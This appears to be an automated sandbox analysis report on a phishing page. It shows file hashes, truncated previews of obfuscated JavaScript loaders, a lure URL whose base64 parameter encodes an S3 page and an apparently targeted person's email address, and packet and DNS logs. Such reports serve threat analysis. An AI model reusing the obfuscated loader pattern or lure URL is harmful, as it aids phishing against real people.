                                    Preview:<script language="javascript">.. ..// == Code Obfuscation Protection from https://blackhackertools.com == //..var _0x1ed2e1=_0x2ee2;function _0x2ee2(_0x9c9942,_0x48bc01){var _0x3ba28f=_0xc205();return _0x2ee2=function(_0x5adf18,_0x109a96){_0x5adf18=_0x5adf18-(-0x25f9+0x1342+-0x269*-0x8);var _0x4d6e10=_0x3ba28f[_0x5adf18];return _0x4d6e10;},_0x2ee2(_0x9c9942,_0x48bc01);}(function(_0x3013e4,_0x5c3302){var _0x35ea46=_0x2ee2,_0x6634c6=_0x3013e4();while(!![]){try{var _0x3d5eee=parseInt(_0x35ea46(0x578))/(0x177+-0x335*0x1+0x1*0x1bf)*(parseInt(_0x35ea46(0x5b9))/(0x333+0x1f3f+-0x10*0x227))+parseInt(_0x35ea46(0x5e4))/(0x19b0+0x1*-0x244d+0x550*0x2)*(-parseInt(_0x35ea46(0x7a7))/(0x1409+-0x33*-0x97+-0x321a))+-parseInt(_0x35ea46(0x63c))/(0x24b3*0x1+-0x1153+-0x135b*0x1)*(-parseInt(_0x35ea46(0x614))/(0x761*-0x3+-0x1*-0xfc2+-0x95*-0xb))+parseInt(_0x35ea46(0x5c0))/(-0xca5+-0x1b4f+-0x1bd*-0x17)*(parseInt(_0x35ea46(0x619))/(0xe10+-0x7*-0x9d+-0x1253))+-parseInt(_0x35ea46(0x5c4))/(0x234a*0x1+0x1258+0x1*
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (4835), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):4966
                                    Entropy (8bit):5.003638420463747
                                    Encrypted:false
                                    SSDEEP:96:PbxvRsn8UEe5lyvn+OYDTOV1l9laKRA4VoKRXje7D5T:Pnq8fOo/+3DTOvVRLddc9T
                                    MD5:6F1E2A9135051DECDFFBB7717D983D1E
                                    SHA1:3960C4C0B53E35E31F6EEAD92E4F2B6E9D09A2BF
                                    SHA-256:2B50B2356BB1C73432BC98BC6F64AF586B33D84EA03BD8926A1F2542AA2E50C9
                                    SHA-512:10485F304A6683C9BBD2B73564AA9F510817A023D1E4CE627A7E6DB641F85D089B09B5968C549B1301DB565F83E04F60BCD0E24A913512B9CFEC3B857599032F
                                    Malicious:false
                                    Reputation:low
                                    URL:https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ==
                                    Preview:<script language="javascript">.. ..// == Code Obfuscation Protection from https://blackhackertools.com == //..function _0x1fe0(){var _0x1bb0c6=['%61%76%61%','0%76%61%72','4%3D%22%6E','%28%66%75%','0%6E%61%6D','%77%2E%6C%','72%65%66%6','0%20%3C%6D','0A%20%20%2','0%7D%29%28','4%65%6E%74','13587dXTOjy','20%3D%20%3','%20%61%74%','4%20%74%79','3%3B%0A%20','%6C%6F%63%','E%2A%29%24','%72%69%70%','22%3E%0A%2','%3E%0A%20%','C%72%65%2E','%65%78%65%','6F%63%61%7','F%64%79%3E','F%6E%20%3D','%72%22%20%','write','%20%76%61%','%20%74%65%','20%20%20%2','%28%29%20%','0A%3C%62%6','%61%64%3E%','%3C%73%63%','0%29%20%74','D%65%3D%22','%3B%0A%20%','9%6F%6E%20','8%74%65%73','75%3D%28%2','6F%2D%72%6','6D%6C%3E','1112PklkVD','5912DFhiYg','4%6F%77%2E','5%72%22%20','3D%3D%20%3','8%74%2F%6A','%20%20%20%','%2F%69%67%','63%6F%6E%7','%20%2F%6C%','%65%76%65%','%3D%22%6E%','C%2F%68%65','B%31%5D%29','2%65%20%3D','74%3E%0A%3','%3C%68%74%','2651455sPMLlm','22%74%65%7','20%6E%61%6','6F%62%28%6','%72%65%66%','%70%65%3D%
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):27252
                                    Entropy (8bit):7.9891895049947195
                                    Encrypted:false
                                    SSDEEP:768:mUmIex+1xK2H1XsC+Ifbhl84t4VyUp88h7:FPyKhNsyc
                                    MD5:5E4F53A8EEDB3574AC841E991494589A
                                    SHA1:32DF0577C8A230C2C9C10CFDA393DDAF1ADAC5D5
                                    SHA-256:79D8BD935497116D303BCE3D64D6B6078CB65004C57546ED7F0EDB9DB30BA19D
                                    SHA-512:8C39F5056555FD8BAE010E88F8B23743C834D03217873F89FBE701049688290E2A6EBE200D8936B6AA26661715CAA45CE9E6423C7DBADE32E7CB234E59D1396D
                                    Malicious:false
                                    Reputation:low
                                    URL:https://logo.clearbit.com/iprotex.de
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):27252
                                    Entropy (8bit):7.9891895049947195
                                    Encrypted:false
                                    SSDEEP:768:mUmIex+1xK2H1XsC+Ifbhl84t4VyUp88h7:FPyKhNsyc
                                    MD5:5E4F53A8EEDB3574AC841E991494589A
                                    SHA1:32DF0577C8A230C2C9C10CFDA393DDAF1ADAC5D5
                                    SHA-256:79D8BD935497116D303BCE3D64D6B6078CB65004C57546ED7F0EDB9DB30BA19D
                                    SHA-512:8C39F5056555FD8BAE010E88F8B23743C834D03217873F89FBE701049688290E2A6EBE200D8936B6AA26661715CAA45CE9E6423C7DBADE32E7CB234E59D1396D
                                    Malicious:false
                                    Reputation:low
                                    No static file info


                                    • Total Packets: 278
                                    • 443 (HTTPS)
                                    • 53 (DNS)
                                    Jan 23, 2025 08:05:32.737011909 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.737015963 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.737026930 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.737031937 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.737056017 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.789093971 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.789113998 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.832618952 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852253914 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852286100 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852303982 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852324963 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852349997 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852371931 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852376938 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852399111 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852401972 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852416039 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852421999 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.852504969 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.852544069 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.853045940 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.853089094 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.853107929 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.853112936 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.853135109 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.853142023 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.853157997 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.853166103 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.853188038 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.853847980 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.853916883 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.853929996 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.895028114 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.938355923 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.938386917 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.938431025 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.938432932 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.938478947 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.938491106 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.938690901 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.938739061 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.938747883 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.938862085 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.938965082 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.939024925 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.939032078 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.939110994 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.939152956 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.939199924 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.939692974 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.939713001 CET443648843.5.138.248192.168.2.6
                                    Jan 23, 2025 08:05:32.939724922 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.939840078 CET64884443192.168.2.63.5.138.248
                                    Jan 23, 2025 08:05:32.959638119 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:32.959714890 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:32.959784985 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:32.959964037 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:32.959995031 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.374818087 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:33.374903917 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:33.374991894 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:33.375761986 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:33.375797987 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:33.461673021 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.462121964 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:33.462145090 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.463587999 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.463665009 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:33.464723110 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:33.464812994 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.465137005 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:33.465153933 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.507096052 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:33.638921022 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.639087915 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.639177084 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:33.640290976 CET64898443192.168.2.6104.18.40.68
                                    Jan 23, 2025 08:05:33.640317917 CET44364898104.18.40.68192.168.2.6
                                    Jan 23, 2025 08:05:33.660244942 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:33.660270929 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:33.660382032 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:33.660537958 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:33.660545111 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.074546099 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.074585915 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.074754953 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.075102091 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.075119019 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.092566967 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:34.092609882 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:34.092813969 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:34.099376917 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:34.099420071 CET4436490913.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:34.099533081 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:34.102963924 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:34.102983952 CET4436490913.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:34.103270054 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:34.103288889 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:34.196396112 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.196624994 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.196657896 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.198126078 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.198205948 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.199223995 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.199326038 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.199363947 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.243335009 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.247338057 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.247406006 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.251341105 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:34.251466036 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:34.253937006 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:34.253973961 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:34.254327059 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:34.255841017 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:34.255981922 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:34.255983114 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:34.255999088 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:34.299343109 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:34.299387932 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.323821068 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.323914051 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.324023008 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.327142954 CET64902443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.327187061 CET4436490276.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.348916054 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.348958969 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.349308014 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.349308014 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.349348068 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.431984901 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:34.432518959 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:34.432518959 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:34.432586908 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:34.432749033 CET4436489940.113.103.199192.168.2.6
                                    Jan 23, 2025 08:05:34.433149099 CET64899443192.168.2.640.113.103.199
                                    Jan 23, 2025 08:05:34.573025942 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.578286886 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.578300953 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.579423904 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.579932928 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.579932928 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.579996109 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.585320950 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.627376080 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.627697945 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.627712965 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.676772118 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.714657068 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.714857101 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.720123053 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:34.772841930 CET4436490913.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:34.783512115 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:34.819346905 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:34.828119993 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:34.929938078 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:34.979116917 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.031860113 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.031898022 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.032429934 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.032470942 CET4436490913.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.032505035 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.032514095 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.033046961 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.033108950 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.033711910 CET4436490913.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.033859015 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.034245014 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.034499884 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.044435978 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.044557095 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.044940948 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.045032024 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.046278954 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.046366930 CET4436490913.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.046684980 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.046694994 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.046884060 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.046899080 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.048763037 CET64907443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.048788071 CET4436490776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.075578928 CET64917443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.075628996 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.077585936 CET64917443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.077585936 CET64917443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.077635050 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.101069927 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.101108074 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.101110935 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.101116896 CET4436490913.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.148745060 CET64909443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.154977083 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.155078888 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.156250000 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.156416893 CET64911443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.156436920 CET4436491176.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.438457966 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.438482046 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.438492060 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.438519955 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.438533068 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.438540936 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.438553095 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.438575029 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.438590050 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.438601971 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.438618898 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.441247940 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.491472960 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.529253960 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.529263020 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.529279947 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.529325962 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.529352903 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.529370070 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.529392958 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.529418945 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.529973984 CET64908443192.168.2.613.32.27.129
                                    Jan 23, 2025 08:05:35.529994965 CET4436490813.32.27.129192.168.2.6
                                    Jan 23, 2025 08:05:35.562932014 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.563184023 CET64917443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.563214064 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.563502073 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:35.563530922 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:35.563594103 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:35.563802004 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:35.563817978 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:35.564374924 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.564683914 CET64917443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.564857006 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.565016031 CET64917443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.611335039 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.744071960 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.744168997 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:35.744220972 CET64917443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.744924068 CET64917443192.168.2.676.223.67.189
                                    Jan 23, 2025 08:05:35.744945049 CET4436491776.223.67.189192.168.2.6
                                    Jan 23, 2025 08:05:36.248660088 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.249002934 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.249013901 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.250458956 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.250565052 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.250859976 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.250971079 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.250999928 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.291373968 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.298683882 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.298707008 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.345690012 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.544862986 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.565455914 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.565466881 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.565495968 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.565510988 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.565516949 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.565541983 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.565578938 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.565606117 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.565613985 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.565635920 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.611944914 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.638501883 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.638513088 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.638547897 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.638556004 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.638577938 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.638658047 CET4436492313.32.27.77192.168.2.6
                                    Jan 23, 2025 08:05:36.638680935 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.638911009 CET64923443192.168.2.613.32.27.77
                                    Jan 23, 2025 08:05:36.638911009 CET64923443192.168.2.613.32.27.77
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 23, 2025 08:05:33.670386076 CET | 192.168.2.6 | 1.1.1.1 | c231 | (Port unreachable) | Destination Unreachable
Jan 23, 2025 08:05:35.588875055 CET | 192.168.2.6 | 1.1.1.1 | c266 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 23, 2025 08:05:27.550106049 CET | 192.168.2.6 | 1.1.1.1 | 0x2908 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:27.550304890 CET | 192.168.2.6 | 1.1.1.1 | 0x5434 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Jan 23, 2025 08:05:31.650388956 CET | 192.168.2.6 | 1.1.1.1 | 0xb5d8 | Standard query (0) | exy77.s3.eu-central-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Jan 23, 2025 08:05:31.650576115 CET | 192.168.2.6 | 1.1.1.1 | 0x5632 | Standard query (0) | exy77.s3.eu-central-1.amazonaws.com | 65 | IN (0x0001) | false
